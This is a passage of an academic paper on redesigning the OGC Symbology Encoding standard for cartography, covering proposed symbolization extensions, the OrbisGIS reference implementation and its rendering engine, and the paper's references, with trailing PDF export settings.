Craig (2009) does suggest the introduction of a mechanism to reference the definition of a Symbolizer hosted within a catalog. Moreover, the report does enrich the referencing with a symbolizer-parameterization mechanism so as to offer complete symbolizer re-usability between different, incompatible feature types. It consists of a list of formal-parameter names and an argument list. It is to notice that such a mechanism does fit the one specified by ISO (2012) in term of parameterized symbol built of dynamic parameters. Thus, in a general way, it is recommended to consider what ISO has already specified concerning the concepts of “collection of symbols and portrayal functions into portrayal catalog.” Concerning this aspect of style management, the proposal suggests to continue the conceptual work by blending together all these recommendations: reintroduce GetStyles/ PutStyles and introduce the mechanism of symbolizer-parameterization inline with ISO (2012). New symbolization capabilities Among the many symbology capabilities that can be extracted from the pending Change Requests at OGC and the research works, we list below (non exhaustively) some relevant ones. Considering the modular structure (see A), each of these capabilities is an extension (e.g., HatchFill is an extension of the Fill abstract concept, just as SolidFill): � UnitOfMeasure: current SE 1.1 standard does only offer two ground units (meter and foot) and one portrayal unit (pixel, which is also not an absolute unit of measure). It may be relevant to add at least three additional units to make measurements more Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 19/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ portable between styling representations and rendering environments: portrayal millimeters and inches as printing measurements, and portrayal (printer’s) points commonly used for font sizes; � Transformations: currently, SE 1.1 standard does offer only locally few transformations capabilities (translation of a polygon or graphic, rotation of a graphic). It may be relevant to spread out all kind of general affine transformations like Translate, Rotate, Scale, Matrix using homogeneous coordinates on geometries and graphics; � Functions: currently, SE 1.1 standard does extend the concept of ogc:expression inherited from the deprecated Filter Encoding 1.1 standard (Vretanos, 2001) to adequately support the needs of symbolization in transforming (categorization, recoding, and interpolation) and editing data (formatting numbers, strings and dates). It may be relevant to directly use the function definition mechanism of Filter Encoding 2.0 standard (Vretanos, 2010) rather re-inventing such a mechanism (Craig, 2009); � CompoundStroke: current SE 1.1 standard does offer simple stroke just like with a pen (optionally with dash pattern) or the linear repetition of a graphic. It may be relevant to allow multiple graphic and/or simpler strokes to be combined together along the linear path. It is interesting to produce complex stroke styles such as rendering a sequence of graphic icons along a line or drawing simple dashed lines between boat-anchor icons (Craig, 2009); � CompositeSymbolizer: currently, grouping of symbolizers is only possible in relation with a rule, eventually driven by a filter. It may be relevant to manage descendant symbolizers as a single unit separately from the definition of a rule. Having a dedicated concept for grouping symbolizers does make the logical grouping more explicit and allows a group of symbolizers to be remotely referenced (see the SymbolizerReference concept in Craig (2009)); � HatchFill: currently, SE 1.1 standard allows one color filling and the repetition of a graphic to fill an area. It may be relevant to add cross hatching, a method of area filling which is often used and has so simple parameters that it should be established as another filling variety. It is required to allow the configuration of such a filling in a way conventional in cartography, otherwise the user would be forced to emulate cross hatching by fiddling with the GraphicFill concept; � DiagramSymbolizer: current SE 1.1 standard does allow the use of graphics generated externally (e.g., static image) or well-known shapes or font glyph whose color can be set internally. It may be relevant to allow the internal definition of more complex diagram symbolization of geographic features like “Pie,” “Bar,” “Line,” “Area,” “Ring,” and “Polar” charts. Indeed, it is a usual and effective way of visualizing statistical data (Iosifescu-Enescu, 2007); � Multiple drawing pass: current SE 1.1 standard does describe a one drawing pass rendering (driven by applying symbolizers in the order they are defined by the style and according to rules and filters). It may be relevant to better control the rendering with the capabilities to order the level of symbol rendering (e.g., to draw nicely connected highway symbols). Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 20/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ REFERENCE IMPLEMENTATION The OrbisGIS platform has been used to prototype an implementation of the symbology model all along the standardization work by iterations with tests and validations (Bocher & Petit, 2015). In the long term, this platform might be adopted as a reference implementation at the OGC (“CITE”). OrbisGIS is a Geographical Information System designed by and for research (Bocher & Petit, 2013) which is the main advantage for research communities comparing to other GIS. Indeed, OrbisGIS does not intend to reproduce classical GIS functionalities. It is designed to explore new issues or questions in the field of geospatial techniques and methods (such as language issues to query spatial information and issues on cartography about standardization, semantics and user interface design). To address these challenges, the OrbisGIS architecture (object and data model) and its user interface are frequently redesigned. This approach is fundamental to test the concepts and the ideas related to the ongoing standardization process of symbology standards at OGC. Furthermore, the fact that we have a common set of GIS features organized with the dynamic module system OSGi to access to the geodata, library to use simple features functions, layer model, rendering engine, etc. (OSGi, 2014), gives flexibility to plug some experimental code without breaking the platform and the user can easily switch from one to another plugin (Fig. 13). More importantly, the usage of OSGi technology does offer a way to implement the modularization principles depicted in the above (i.e., one OSGi bundle per symbology extension). Another motivation is related to the license. OrbisGIS is an open source software, distributed under the GPL3 license and therefore grants four freedoms (1) to run the program for any purpose, (2) to study how the program works and adapt it to your needs, Figure 13 OrbisGIS dynamic module system with OSGi. Full-size DOI: 10.7717/peerj-cs.143/fig-13 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 21/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-13 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ (3) to redistribute copies so you can help your neighbour, and (4) to improve the program, and to release your improvements to the public, so that the whole community benefits (Steiniger & Hunter, 2012). This aspect is essential in order to have a reference implementation available for the community of implementers of a standard, guiding them better in the understanding of a specification. Given the core principle of science that having open source code available does enable reproducibility (Ertz, Rey & Joost, 2014), we argue that this is also valid for open standards. On one side, it is easy for other researchers and businesses to verify and re-use new developments and adapt them to their needs (Steiniger & Hunter, 2012). Furthermore, having the code of the rendering engine, the user interfaces and all the tests fully accessible should facilitate the understanding and the dissemination of standards for portrayal interoperability while minimizing interoperability defects. In the following we describe the main aspects covered by OrbisGIS to implement the proposed redesign of the symbology model. XML encoding/decoding In the context of a prototyping iteration, the symbology model presented in the chapter 4 has been transposed to a XSD schema (Maxence et al., 2017). The Java Architecture for XML Binding (Ort & Mehta, 2003) library is used to generate the XSD schema-derived Java binding classes. Finally, a Java Style Object Model is built. Thus, symbology instructions are stored in a style file using XML encoding and is parsed prior to be applied by the rendering engine. Rendering engine The rendering engine is a OSGi bundle whose mechanism is divided into 12 sequences (Fig. 14): (1) User interface event to draw a map. (2) The renderer engine gets the style file that contains the symbology instructions. Figure 14 Main sequences of the rendering engine. Full-size DOI: 10.7717/peerj-cs.143/fig-14 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 22/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-14 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ (3, 4 and 5) The style file is read by the XML parser to create the Java Style Object Model composed of rules and symbols. (6) The renderer engine starts to draw the style object looping over each rules. (7) Each rule is scanned to check if a filter must be applied. The filter condition (e.g., select all values greater than : : : ) is prepared for each symbolizer of the rule. (8) The renderer engine starts to draw all symbols available in the Java Style Object Model. (9) Each symbol reads the data source on which the style must be applied. (10) A set of features according to the potential filter constraint of the symbolizer is returned (including geometries and data attributes). (11) The symbols are filled with the features properties to create the graphic elements and visual variables. (12) Finally, the renderer engine displays the style as a map image. User interfaces OrbisGIS offers two kind of user interfaces for configuring the map styles using the capabilities of the underlying symbology model (Fig. 15): � At first some productivity tools organized around a set of widgets each dedicated to common thematic maps. The possibilities are limited to what these widgets are able to configure related to what they have been built for. Nonetheless, the second tool can then be used in an expert mode to go further. � Secondly, rather intended for an expert who want to tinker and tweak. As an advanced style editor, it is a flexibility tool which allows to manipulate all elements of the symbology model (Rule, Symbols, visual variables). A good knowledge of the symbology model is required because each elements of the style must be set individually. Consequently, the user can express without any limitation (except the limits of the symbology model itself) all her(his) creativity to build cartographic visualizations. To illustrate some results rendered with OrbisGIS we present two maps extracted from the “Wall of Maps” (Bocher & Ertz, 2016). The first one shows a bivariate map to display the number of building permits in Europe in 2005 compared to 2014 (Fig. 16). Bivariate map is a common technique to combine visual variables. The map uses the same type of visual variable to represent two values (as half circles). The main symbology elements used to create this bivariate map are: � The style element contains two rules named A and B; � Rule A contains one symbolizer element (AreaSymbolizer) to display the stroke of the European countries; � Rule B defines the bivariate proportional symbol with two elements of PointSymbolizer (for readability, we present only the instructions for the left half-circle visual variable); Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 23/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ � The PointSymbolizer contains several sub-elements: – The geometry element allows specifying which geometry attribute is to be rendered; – The ST_PointOnSurface is an OGC filter function (Vretanos, 2010) used to have a point geometry guaranteed to lie on the surface. This new point derived from the input geometry is the location where to anchor a MarkGraphic, otherwise the symbol might be applied on all the vertices of a geometry; � the MarkGraphic is defined by: – The symbol shape identified by a well-known name, HALFCIRCLE (right side); – The size of the shape varies according the height of its view box; – To have the shape size proportional with the number of building permits in 2015: � An interpolate function is applied on; � It uses a ValueReference that points to the attribute named permits2005; � The interpolation is defined by two interpolation points chosen along a desired mapping curve (here the minimum and maximum values); � For each interpolation point the height of the view box is specified with a specific unit of measure; – Because the half-circle shape is drawn to the right side, a 180� rotation is operated; – To finish, the MarkGraphic is filled with a RGB color. The second map shows a combination of several visual variables: shape, size, color, patterns and orientation (Fig. 17). The style is organized around six filtered rules that correspond to the biogeographic regions in Switzerland. We present two Rules (A and B) that use the HatchFill and GraphicFill concepts which are extensions of the Fill abstract concept of the symbolizer model. CONCLUSION Considering the fundamental works of Bertin & Berg (2010) and successors, the community of map makers has constantly investigated questions about cartographic visualizations in term of design using the appropriate visual variables and combining them together with relevancy. Despite an important body of principles and practices, the community did not grasp the questions about standardization. However, given the multiplicity of software used to flood the world with maps, these questions are nowadays a strategic challenge to be considered in relation with operational requirements. Even if the definition of a cartographic-oriented standard is not able to act as a complete cartographic design framework by itself, we argue that pushing forward the work aiming at the creation of dedicated standards for cartography is a way to share and disseminate good practices. Indeed, too much SDIs do merely accept the limits of the current standards and consequently poor map design and quality. While they have to apply OGC standards, it is essential to build standards so as to be able to enrich their Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 24/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ Figure 15 (A) The screenshot shows the list of productivity tools available in OrbisGIS. (B) The screenshot shows the user interface of the productivity tool dedicated to choropleth maps. (C) The screenshot shows a prototype of advanced style editor. Full-size DOI: 10.7717/peerj-cs.143/fig-15 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 25/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-15 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ Figure 17 (A) Symbology instructions showing how to combine visual variables (YAML encoded for the ease of reading). (B) A map of the biogeographic regions in Switzerland coming out from the rendering engine using these instructions. Full-size DOI: 10.7717/peerj-cs.143/fig-17 Figure 16 (A) Some redesigned symbology instructions (YAML encoded for the ease of reading). (B) A bivariate proportional symbol map coming out from the rendering engine using these instructions. Full-size DOI: 10.7717/peerj-cs.143/fig-16 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 26/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-17 http://dx.doi.org/10.7717/peerj-cs.143/fig-16 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ cartographic capabilities at long-term, to make grow up the good practices and finally to improve the quality of the visualizations. In this sense, we have identified some use cases showing how it is important to make portrayal interoperability operational for sharing cartography, from discovery to collaboration activities, by way of authoring and cataloging activities. From research results in link with the dedicated SLD/SE OGC SWG (Ertz & Bocher, 2010), this paper does extract some recommendations to enable portrayal interoperability. They invite to improve the OGC SE standard based on principles and practices in cartography. We start from a functional definition of a map translated into a set of visual variables which are combined to create symbols and finally a map style. The proposed recommendations do observe this functional definition which is already at the heart of how SE standard has been specified by OGC. Now, in the long term, it is recommended that a design approach is driven by a conceptual definition of the model and unconstrained by specific encoding aspects, and, as soon as the model is ready, then a default encoding is offered (e.g., XSD/XML). Following from this approach of dissociation, it does allow the definition of other encodings according to the various flavors within the communities. Given that the cartographic requirements will progress over time due to practices growing up and according to domain specific features, the offered symbology model is empowered so as to be extensible and ready to offer new cartographic methods. Moreover, such a modular approach allows implementations to be compliant step-by-step. As a consequence the adoption of the standard should be favored. Finally, we claim to a testsuite within the OGC CITE so as to help to disambiguate and test the visual conformance of the implementations. While it shall be associated to reference implementations, having at least one open source is also essential for the community of implementers, guiding them even more in the understanding of the standard. In this sense, OrbisGIS is an open source platform that has been used to prototype an implementation of the symbology model all along the standardization process by iterations with tests and validations. It might become an open source reference implementation. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Erwan Bocher conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 27/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ � Olivier Ertz conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: GitHub repository with the OrbisGIS platform, containing a partial implementation of the Symbology Rendering model: https://github.com/orbisgis/orbisgis. REFERENCES Andrae C, Graul C, Over M, Zipf A. 2011. Web Portrayal Services: OpenGIS Web Map Service, Styled Layer Descriptor, Symbology Encoding und ISO 19117 Portrayal vorgestellt und erläutert. OpenGIS Essentials: die Geo-Standards von OGC und ISO im Überblick. Berlin: Wichmann. OCLC 846108747. Bertin J, Berg WJ. 2010. Semiology of Graphics: Diagrams, Networks, Maps. First Edition. Redlands: ESRI Press. Bocher E, Ertz O. 2015. Towards cartographic portrayal interoperability—the revision of OGC symbology encoding standard. In: Proceedings of the 1st ICA European Symposium on Cartography, Vienna, Austria. Vol. 1, 116–119. Bocher E, Ertz O. 2016. OGC symbology model and encodings—the wall of maps. Available at http://se.orbisgis.org (accessed 27 September 2017). Bocher E, Ertz O, Laurent M, Hégron G, Petit G, Rappo D. 2011. Cartographie et standard: du modèle a l’utilisateur. In: Proceedings of the 25th International Cartographic Conference Paris, 3–8 July 2011. Paris: ICCOCLC. Bocher E, Petit G. 2013. ORBISGIS: geographical information system designed by and for research. In: Bucher B, Ber FL, eds. Innovative Software Development in GIS. Hoboken: John Wiley & Sons, Inc., 23–66. Bocher E, Petit G. 2015. Cartography—OrbisGIS manual 5.1 documentation. Available at http://orbisgis.readthedocs.io/en/latest/users/cartography.html?highlight=symbology (accessed 27 September 2017). Bocher E, Petit G, Gueganno A, Fortin N, Gourlay A, Ertz O. 2012. Séminaire de restitution du SOGVILLE (Système d’Observation Géographique de la Ville). Technical report. Available at https://halshs.archives-ouvertes.fr/halshs-01141548 (accessed 27 September 2017). Brackin R, Gonçalves P. 2014. OGC ows context conceptual model. Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://www.opengeospatial.org/standards/owc (accessed 27 September 2017). Bruns A. 2013. From Prosumption to Produsage. Cheltenham: Edward Elgar, 67–78. Carpendale MST. 2003. Considering visual variables as a basis for information visualisation. Technical report. Calgary: University of Calgary. Cooper M, Sykora P, Hurni L. 2005. The role of cartography within distributed software systems: what can we contribute? How can we prosper? In: Lapaine M, Association IC, eds. 22nd International Cartographic Conference and 13th General Assembly of the ICA. A Coruña: International Cartographic Society. Craglia M. 2010. Building INSPIRE: the spatial data infrastructure for Europe. ArcNews 32:1–6. Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 28/31 https://github.com/orbisgis/orbisgis http://se.orbisgis.org http://orbisgis.readthedocs.io/en/latest/users/cartography.html?highlight=symbology https://halshs.archives-ouvertes.fr/halshs-01141548 http://www.opengeospatial.org/standards/owc http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ Craig B. 2009. OGC� ows-6 symbology encoding (se) changes (OGC 09-016). Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://portal.opengeospatial.org/files/ ?artifact_id=33515 (accessed 27 September 2017). De la Beaujardiere J. 2006. OpenGIS web map server implementation specification (OGC 06–042 Version 1.3.0). Open Geospatial Consortium Inc., 85. Available at http://portal.opengeospatial. org/files/?artifact_id=14416 (accessed 27 September 2017). Dietze L, Zipf A. 2007. Extending OGC styled layer descriptor (SLD) for thematic cartography— towards the ubiquitous use of advanced mapping functions through standardized visualization rules. In: 4th International Symposium on LBS and TeleCartography, Hong Kong. Duarte Teixeira M, De Melo Cuba R, Mizuta Weiss G. 2005. Creating thematic maps with OGC standards through the web. In: Proceedings of the GML and Geo-Spatial Web Services Conference, Vancouver. Lemmer, The Netherlands: GIM International. Environmental Protection Agency (EPA). 2011. Guidance note for strategic noise mapping: guidance note for strategic noise mapping for the environmental noise regulations 2006. Technical report. Wexford: Environmental Protection Agency. Available at https://www.epa.ie/ pubs/advice/noisemapping/EPA%20Guidance%20Note%20for%20Strategic%20Noise% 20Mapping%20(version%202).pdf (accessed 27 September 2017). Ertz O. 2013. Feasibility study about Swiss geological symbols using the system-independent OGC SLD/SE standards. Technical report. Available at https://drive.switch.ch/index.php/s/ d6AFtdEaslej3wa (accessed 27 September 2017). Ertz O, Bocher E. 2010. Styled layer descriptor and symbology encoding 1.2 SWG. Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://www.opengeospatial.org/ projects/groups/sldse1.2swg (accessed 27 September 2017). Ertz O, Julien LG, Bocher E. 2012. Collaborative authoring and polypublication of cartographic content. In: Ertz O, Joost S, Tonini M, eds. In: OGRS2012 Symposium Proceedings. Yverdon-Les-Bains: OGRS. Ertz O, Rey SJ, Joost S. 2014. The open source dynamics in geospatial research and education. Journal of Spatial Information Science 8:183–193 DOI 10.5311/josis.2014.8.182. Eurostat/Regional Statistics. 2017. Population on 1 January by broad age group, sex and nuts 3 region, females, total. Available at http://ec.europa.eu/eurostat (accessed 27 September 2017). Field K. 2014. A cacophony of cartography. Cartographic Journal 51(1):1–10 DOI 10.1179/0008704114z.000000000120. GeoServer. 2017. Geoserver 2.11.x user manual. Available at http://docs.geoserver.org/stable/en/ user/styling/ysld/index.html (accessed 27 September 2017). Hopfstock A, Grünreich D. 2009. A user-oriented map design in the SDI environment using the example of a European reference map at medium scale. In: Proceedings of the 24th International Cartographic Conference. Santiago de Chile: ICC. INSPIRE Drafting Team. 2008. D2.6: methodology for the development of data specifications. Available at http://inspire.ec.europa.eu/reports/ImplementingRules/DataSpecifications/D2.6_v3.0.pdf (accessed 27 September 2017). INSPIRE Drafting Team. 2014. D2.5: generic conceptual model. Available at http://inspire.ec. europa.eu/documents/Data_Specifications/D2.5_v3.4.pdf (accessed 27 September 2017). INSPIRE Thematic Working Group Geology. 2013. D2.8.II.4 INSPIRE data specification on geology—technical guidelines. Available at http://inspire.ec.europa.eu/id/document/tg/ge (accessed 27 September 2017). Iosifescu-Enescu I. 2007. Se implementation specification change request—extensions for thematic mapping (OGC cr07-105). Technical report. Wayland: Open Geospatial Consortium, Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 29/31 http://portal.opengeospatial.org/files/?artifact_id=33515 http://portal.opengeospatial.org/files/?artifact_id=33515 http://portal.opengeospatial.org/files/?artifact_id=14416 http://portal.opengeospatial.org/files/?artifact_id=14416 https://www.epa.ie/pubs/advice/noisemapping/EPA%20Guidance%20Note%20for%20Strategic%20Noise%20Mapping%20(version%202).pdf https://www.epa.ie/pubs/advice/noisemapping/EPA%20Guidance%20Note%20for%20Strategic%20Noise%20Mapping%20(version%202).pdf https://www.epa.ie/pubs/advice/noisemapping/EPA%20Guidance%20Note%20for%20Strategic%20Noise%20Mapping%20(version%202).pdf https://drive.switch.ch/index.php/s/d6AFtdEaslej3wa https://drive.switch.ch/index.php/s/d6AFtdEaslej3wa http://www.opengeospatial.org/projects/groups/sldse1.2swg http://www.opengeospatial.org/projects/groups/sldse1.2swg http://dx.doi.org/10.5311/josis.2014.8.182 http://ec.europa.eu/eurostat http://dx.doi.org/10.1179/0008704114z.000000000120 http://docs.geoserver.org/stable/en/user/styling/ysld/index.html http://docs.geoserver.org/stable/en/user/styling/ysld/index.html http://inspire.ec.europa.eu/reports/ImplementingRules/DataSpecifications/D2.6_v3.0.pdf http://inspire.ec.europa.eu/documents/Data_Specifications/D2.5_v3.4.pdf http://inspire.ec.europa.eu/documents/Data_Specifications/D2.5_v3.4.pdf http://inspire.ec.europa.eu/id/document/tg/ge http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ Inc. Available at https://portal.opengeospatial.org/files/?artifact_id=23359 (accessed 27 September 2017). Iosifescu-Enescu I, Hugentobler M, Hurni L. 2010. Web cartography with open standards—a solution to cartographic challenges of environmental management. Environmental Modelling & Software 25(9):988–999 DOI 10.1016/j.envsoft.2009.10.017. Iosifescu-Enescu I, Hurni L. 2007. Towards cartographic ontologies or how computers learn cartography. In: Proceedings of the 23th International Cartographic Conference. Moscow: ICC. International Organization for Standardization (ISO). 2012. ISO 19117:2012—geographic information—portrayal. Available at https://www.iso.org/standard/46226.html. Lalonde W. 2002. Styled layer descriptor profile of the web map service implementation specification (OGC 02-070). Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://www.opengeospatial.org/standards/sld (accessed 27 September 2017). Lonjon A, Thomasson J-J, Maesano L. 2006. Modélisation XML. Architecte Logiciel. Eyrolles Edition. Paris: Eyrolles. Lupp M. 2007. Styled Layer Descriptor Profile of the Web Map Service Implementation Specification (OGC 05-078r4). Wayland: Open Geospatial Consortium, Inc. MacEachren AM. 2004. How Maps Work—Representation, Visualization, and Design. New York: Guilford Press. MacWright T. 2016. The end of cartocss. Available at https://blog.mapbox.com/the-end-of-cartocss- da2d7427cf1 (accessed 27 September 2017). Mapbox. 2017. Cartocss. Available at https://carto.com/docs/carto-engine/cartocss (accessed 27 September 2017). Maxence L, Olivier E, Erwan B, Sylvain P. 2017. OGC SE custom JAXB. Available at https://github. com/orbisgis/ogc-custom-jaxb (accessed 27 September 2017). Mays J. 2012. Using SLD definitions to display charts in a deegree WMS. In: FOSS4G 2008 Conference. Cape Town: Open Source Geospatial Foundation. McKenna J. 2011. Mapserver 7.0.6 documentation: OGC support and configuration. Available at http://mapserver.org/ogc/sld.html (accessed 27 September 2017). McMaster R, McMaster S. 2002. A history of twentieth-century American academic cartography. Cartography and Geographic Information Science 29(3):305–321 DOI 10.1559/152304002782008486. Montello DR. 2002. Cognitive map-design research in the twentieth century: theoretical and empirical approaches. Cartography and Geographic Information Science 29(3):283–304 DOI 10.1559/152304002782008503. Müller M. 2006. Styled Layer Descriptor Profile of the Web Map Service Implementation Specification (OGC 05-078r4). Wayland: Open Geospatial Consortium, Inc. Nicolas L, Christine Z. 2013. Espon cartographic language—mapping guide. Technical report. Paris: UMS RIATE, Université Paris Diderot. Available at http://f.hypotheses.org/wp-content/ blogs.dir/1381/files/2014/02/Task4_final_ECL_MappingGuide_dec13.pdf (accessed 27 September 2017). OpenStreetMap. 2017. Mapcss 0.2. Available at http://wiki.openstreetmap.org/wiki/MapCSS/0.2 (accessed 27 September 2017). Ort E, Mehta B. 2003. Java architecture for xml binding (JAXB). Available at http://www.oracle. com/technetwork/articles/javase/index-140168.html (accessed 27 September 2017). Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 30/31 https://portal.opengeospatial.org/files/?artifact_id=23359 http://dx.doi.org/10.1016/j.envsoft.2009.10.017 https://www.iso.org/standard/46226.html http://www.opengeospatial.org/standards/sld https://blog.mapbox.com/the-end-of-cartocss-da2d7427cf1 https://blog.mapbox.com/the-end-of-cartocss-da2d7427cf1 https://carto.com/docs/carto-engine/cartocss https://github.com/orbisgis/ogc-custom-jaxb https://github.com/orbisgis/ogc-custom-jaxb http://mapserver.org/ogc/sld.html http://dx.doi.org/10.1559/152304002782008486 http://dx.doi.org/10.1559/152304002782008503 http://f.hypotheses.org/wp-content/blogs.dir/1381/files/2014/02/Task4_final_ECL_MappingGuide_dec13.pdf http://f.hypotheses.org/wp-content/blogs.dir/1381/files/2014/02/Task4_final_ECL_MappingGuide_dec13.pdf http://wiki.openstreetmap.org/wiki/MapCSS/0.2 http://www.oracle.com/technetwork/articles/javase/index-140168.html http://www.oracle.com/technetwork/articles/javase/index-140168.html http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ OSGi. 2014. The OSGi alliance OSGi core. Technical report. San Ramon: OSGi Alliance. Available at https://osgi.org/download/r6/osgi.core-6.0.0.pdf (accessed 27 September 2017). Peterson GN. 2009. GIS Cartography: A Guide to Effective Map Design. First Edition. Boca Raton: CRC Press. Policy SWG. 2009. The specification model—a standard for modular specifications (OGC 08-131r3). Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://www. opengeospatial.org/standards/modularspec (accessed 27 September 2017). Portele C. 2007. OpenGIS� geography markup language (GML) encoding standard, version 3.2.1 (OGC 07-036). Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://www.opengeospatial.org/standards/gml (accessed 27 September 2017). Rita E, Borbinha J, Martins B. 2012. Extending SLD and SE for cartograms. In: GSDI 12 World Conference. Singapore: Global Spatial Data Infrastructure Association. Sae-Tang A, Ertz O. 2007. Towards web services dedicated to thematic mapping. OSGeo Journal 3:30–34. Schnabel O, Hurni L. 2007. Diagram markup language—a new model for symbolization in internet maps. In: Proceedings of the 23th International Cartographic Conference. Moscow: ICC. Slocum TA, MacMaster RB, Kessler FC, Howard HH. 2009. Thematic Cartography and Geovisualization. Third Edition. Upper Saddle River: Pearson Education. Steiniger S, Hunter AJS. 2012. Free and Open Source GIS Software for Building a Spatial Data Infrastructure. Berlin: Springer, 247–261. Sykora P, Schnabel O, Enescu II, Hurni L. 2007. Extended cartographic interfaces for open distributed processing. Cartographica: The International Journal for Geographic Information and Geovisualization 42(3):209–218 DOI 10.3138/carto.42.3.209. Tóth K, Portele C, Illert A, Lutz M, Nunes de Lima M. 2012. A Conceptual Model for Developing Interoperability Specifications in Spatial Data Infrastructures. Luxembourg: European Commission Joint Research Centre. Tyner JA. 2010. Principles of Map Design. New York: Guilford Press. Van den Brink L, Portele C, Vretanos PA. 2012. Geography markup language (GML) simple features profile—with corrigendum (OGC 10-100r3). Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://www.opengeospatial.org/standards/gml (accessed 27 September 2017). Vretanos P. 2010. OpenGIS filter encoding 2.0 encoding standard (OGC 09-026r1 and ISO/DIS 19143). Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://www.opengeospatial.org/standards/filter (accessed 27 September 2017). Vretanos PA. 2001. Filter encoding implementation specification. Technical report. Wayland: Open Geospatial Consortium, Inc. Available at http://www.opengeospatial.org/standards/filter (accessed 27 September 2017). Wood D, Fels J. 1992. The Power of Maps. Mappings. New York: Guilford Press. Zipf A. 2005. Using Styled Layer Descriptor (SLD) for the Dynamic Generation of User- and Context- Adaptive Mobile Maps—A Technical Framework. Berlin: Springer, 183–193. Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 31/31 https://osgi.org/download/r6/osgi.core-6.0.0.pdf http://www.opengeospatial.org/standards/modularspec http://www.opengeospatial.org/standards/modularspec http://www.opengeospatial.org/standards/gml http://dx.doi.org/10.3138/carto.42.3.209 http://www.opengeospatial.org/standards/gml http://www.opengeospatial.org/standards/filter http://www.opengeospatial.org/standards/filter http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ A redesign of OGC Symbology Encoding standard for sharing cartography Introduction From Map Design to Portrayal Interoperability Open Standards for Sharing Cartography Proposals Reference Implementation Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 